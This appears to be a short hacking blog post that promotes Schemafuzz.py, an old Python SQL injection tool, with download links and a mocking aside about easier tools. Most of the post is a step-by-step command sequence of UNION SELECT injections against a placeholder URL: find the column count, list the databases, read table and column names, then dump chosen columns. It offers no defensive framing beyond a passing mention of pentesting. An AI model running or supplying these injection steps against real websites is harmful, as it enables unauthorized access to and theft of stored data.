Now, Many tool hacking is easy to run Like Havij for database dump. But A person says that its tool for child 3 years old. Hahaha. Back to Schemafuzz, This tool quiet old named Schemafuzz that coded by Darkc0de with phyton language. But Its still usefull to help to pentest website that buggy with SQL injection. Let's Download And See tutorial for command of Schemafuzz.py
Requirement :
1.Phyton Download Here For windows
Here is preview
 |
| Schemafuzz Priview |
How it runs?
1.Finding range column
schemafuzz.py -u "http://www.EXAMPLE.com/file.php?par=1" --findcol
2.Database name
schemafuzz.py -u "http://www.EXAMPLE.com/file.php?par=1+AND+1=2+UNION+SELECT+1,darkc0de,2,3"; --dbs
3.Table and column name
schemafuzz.py -u "http://www.EXAMPLE.com/file.php?par=1+AND+1=2+UNION+SELECT+1,darkc0de,2,3"; --schema -D databasename
4.Dump it
schemafuzz.py -u "http://www.EXAMPLE.com/file.php?par=1+AND+1=2+UNION+SELECT+1,darkc0de,2,3"; --dump -D databasename -T tablename -C columnname,Columnname2
Here is Link to download Schemafuzz.pyDownload SchemafuzzMirror
Download Schemafuzz (From PasteBin)
Search Terms :
- Download Schemafuzz.py
